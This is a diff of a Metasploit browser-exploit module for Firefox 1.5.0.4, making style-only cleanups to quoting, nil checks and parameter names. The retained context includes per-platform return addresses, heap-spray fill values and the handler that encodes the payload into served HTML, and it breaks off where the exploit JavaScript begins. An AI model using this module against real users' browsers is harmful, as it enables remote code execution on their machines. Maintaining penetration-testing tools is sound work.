@@ -43,9 +43,8 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'Payload' => {
           'Space' => 512,
-          'BadChars' => "",
+          'BadChars' => ''
         },
-        'Platform' => %w{win linux osx},
         'Targets' => [
           [
             'Firefox 1.5.0.4 Windows x86',
@@ -53,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => 'win',
               'Arch' => ARCH_X86,
               'Ret' => 0x08000800,
-              'Fill' => "%u0800",
+              'Fill' => '%u0800'
             }
           ],
           [
@@ -62,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => 'linux',
               'Arch' => ARCH_X86,
               'Ret' => -0x58000000,
-              'Fill' => "%ua8a8",
+              'Fill' => '%ua8a8'
             }
           ],
           [
@@ -71,7 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => 'osx',
               'Arch' => ARCH_PPC,
               'Ret' => 0x0c000000,
-              'Fill' => "%u0c0c",
+              'Fill' => '%u0c0c'
             }
           ],
           [
@@ -80,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => 'osx',
               'Arch' => ARCH_X86,
               'Ret' => 0x1c000000,
-              'Fill' => "%u1c1c",
+              'Fill' => '%u1c1c'
             }
           ],
         ],
@@ -94,11 +93,11 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def on_request_uri(cli, request)
+  def on_request_uri(cli, _request)
     # Re-generate the payload
-    return if ((p = regenerate_payload(cli)) == nil)
+    return if ((p = regenerate_payload(cli)).nil?)
 
-    print_status("Sending #{self.name}")
+    print_status("Sending #{name}")
     send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
 
     # Handle the payload
@@ -108,7 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def generate_html(payload)
     enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
 
-    return %Q|
+    return %|
 <html><head>
 <script>
   function Exploit() {
